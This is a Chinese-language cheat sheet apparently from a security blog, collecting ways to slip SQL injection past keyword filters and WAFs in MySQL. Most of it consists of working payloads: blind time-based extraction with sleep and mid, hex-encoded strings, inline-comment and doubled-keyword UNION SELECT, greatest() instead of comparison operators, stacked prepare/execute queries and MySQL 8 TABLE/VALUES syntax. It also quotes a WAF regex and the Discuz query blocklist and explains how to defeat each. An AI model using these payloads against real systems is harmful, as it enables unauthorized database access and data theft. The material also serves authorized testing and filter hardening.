在SQL注入中经常会遇到服务端针对注入关键字进行过滤,经过查询各种文章,总结了一部分绕过的方法。
2020.08.08更新:增加利用MySQL8.0语法新特性绕过方法,增加SQL注入过滤和检测的几种思路和绕过方法
1
| SELECT/**/name/**/FROM/**/table
|
1
| %a0 发出去就是空格的意思,但是需要在burp中抓包后修改
|
1
2
3
| select * from users where id=8E0union select 1,2,3
等价于
select * from users where id=8.0 select 1,2,3
|
如果空格被过滤,括号没有被过滤,可以用括号绕过。
在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。
例如:
1
| select(user())from dual where(1=1)and(2=2)
|
这种过滤方法常常用于time based盲注,例如:
1
| ?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23
|
会使用到引号的地方一般是在最后的where子句中。如下面的一条SQL语句,这条语句就是一个简单的用来查选得到users表中所有字段的一条语句:
1
| select column_name from information_schema.tables where table_name="users"
|
这个时候如果引号被过滤了,那么上面的where子句就无法使用了。那么遇到这样的问题就要使用十六进制来处理这个问题了。
users的十六进制的字符串是7573657273。那么最后的SQL语句就变为了:
1
| select column_name from information_schema.tables where table_name=0x7573657273
|
对于substr()和mid()这两个方法可以使用from to的方式来解决:
1
2
| select substr(database() from 1 for 1);
select mid(database() from 1 for 1);
|
1
2
3
| union select 1,2
等价于
union select * from (select 1)a join (select 2)b
|
1
2
| select ascii(mid(user(),1,1))=80 #等价于
select user() like 'r%'
|
对于limit可以使用offset来绕过:
1
2
3
| select * from news limit 0,1
等价于
select * from news limit 1 offset 0
|
1
| id=1' union select 1,2,3||'1
|
或者:
1
| id=1' union select 1,2,'3
|
greatest()、least():(前者返回最大值,后者返回最小值)
同样是在使用盲注的时候,在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符,那么就需要使用到greatest来进行绕过了
最常见的一个盲注的SQL语句:
1
| select * from users where id=1 and ascii(substr(database(),0,1))>64
|
此时如果比较操作符被过滤,上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,…)函数返回输入参数(n1,n2,n3,…)的最大值
那么上面的这条SQL语句可以使用greatest变为如下的子句:
1
| select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64
|
between a and b:返回a,b之间的数据,不包含b。
1
| and=`&&` or=`||` xor=`|` not=`!`
|
常用注释符:
//、--、/**/、#、--+、---、;、%00、--a
用法:
1
| U/**/ NION /**/ SE/**/ LECT /**/user,pwd from user
|
1
| id=-1'/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#
|
1
| id=-1'UNIunionONSeLselectECT1,2,3–-
|
1
| or ‘swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ‘+’ …..’ )
|
在MySQL 8.0.19版本后,MySQL推出了一些新特性,使我们可以不使用select就能够取数据
可以直接列出表的全部内容
1
| TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]
|
如 select * from user 就可以用 table user 替代来进行绕过
可以列出一行的值
1
2
3
4
5
6
7
8
9
10
| VALUES row_constructor_list [ORDER BY column_designator] [LIMIT BY number]
row_constructor_list:
ROW(value_list)[, ROW(value_list)][, ...]
value_list:
value[, value][, ...]
column_designator:
column_index
|
例如直接列出一行的值
1
| VALUES ROW(1,2,3), ROW(4,5,6);
|
VALUES和TABLES语句的结果都是表数据,可以结合起来使用
如URLEncode编码,ASCII,HEX,unicode编码绕过
or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()
举例:substring()和substr()无法使用时:?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
或者:
substr((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1
|
这种是最简单的,针对某些黑名单关键字,直接进行 str_replace
如果替换的不完全,可以用 selselectect 来替换 select 绕过
在一些waf或者cms会见到类似如下的防护代码
1
2
3
4
5
6
7
| $filter = "\\<.+javascript:window\\[.{1}\\\\x|<.*=(&#\\d+?;?)+?>|<.*(data|src)=data:text\\/html.*>|\\b(alert\\(|confi
rm\\(|expression\\(|prompt\\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|load_file\s*?\\()|<[a-z]+?\\b[^>]*?\\bon([a-z]{4,})
\s*?=|^\\+\\/v(8|9)|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<
|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.*\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT(\(|@{1
,2}\w+?\s*|\s+?.+?|.*(`|'|\").+(`|'|\")\s*)|UPDATE\s*(\(.+\)\s*|@{1,2}.+?\s*|\s+?.+?|(`|'|\").*?(`|'|\")\s*)SET|INSER
T\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM\s+?|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)|FROM\s.?|\(select|\(\s
select|\bunion\b|select\s.+?";
|
这里面匹配了各种模式的注入语句,但是还是可以绕过的
比如说 INSERT\\s+INTO.+?VALUES 可以使用 insert into xxx select 的方式进行绕过
在经过不断的更新换代升级之后,产生了一些非常经典的正则,主要考虑到注入获取数据的时候需要联合查询或者子查询来完成
例如discuz的防护代码 _do_query_safe
1
2
3
4
5
6
7
8
9
10
11
12
13
| $_config['security']['querysafe']['dfunction'] = array('load_file','hex','substring','if','ord','char');
$_config['security']['querysafe']['daction'] = array('@','intooutfile','intodumpfile','unionselect','(select', 'un
ionall', 'uniondistinct');
$_config['security']['querysafe']['dnote'] = array('/*','*/','#','--','"');
...
$clean = preg_replace("/[^a-z0-9_\-\(\)#\*\/\"]+/is", "", strtolower($clean));
...
if (is_array(self::$config['dfunction'])) {
foreach (self::$config['dfunction'] as $fun) {
if (strpos($clean, $fun . '(') !== false)
return '-1';
}
}
|
这段代码首先将SQL语句除了a-z``0-9和几个有限的字符外的其他所有字符替换为空,然后对其进行匹配,如果能够匹配到类似unionall、(select这样的获取数据所要用到的代码,就拒绝执行
但是即便是这样也还可以绕过,比如同表注入就不需要用到子查询
1
| select * from test where test3=-1 or substr(test2,1,1)=1
|
或者可以使用多语句的方式执行
1
2
3
| set @a:=0x73656c656374202a2066726f6d2074657374;
prepare s from @a;
execute s;
|
也可以
1
2
| handler user open;
handler user read first;
|
这是最高级的方式,模仿MySQL对SQL的分析,waf对用户的输入进行语法语义分析,如果符合MySQL的语法,就判断为SQL注入从而阻断
这种防护的绕过思路就是找特殊的语法,这些特殊语法waf可能没有覆盖全面,从而导致waf语义分析失败,从而进行绕过
例如我们上面说的MySQL8的tables和values语句就是比较新的语法,有很多waf还米有覆盖到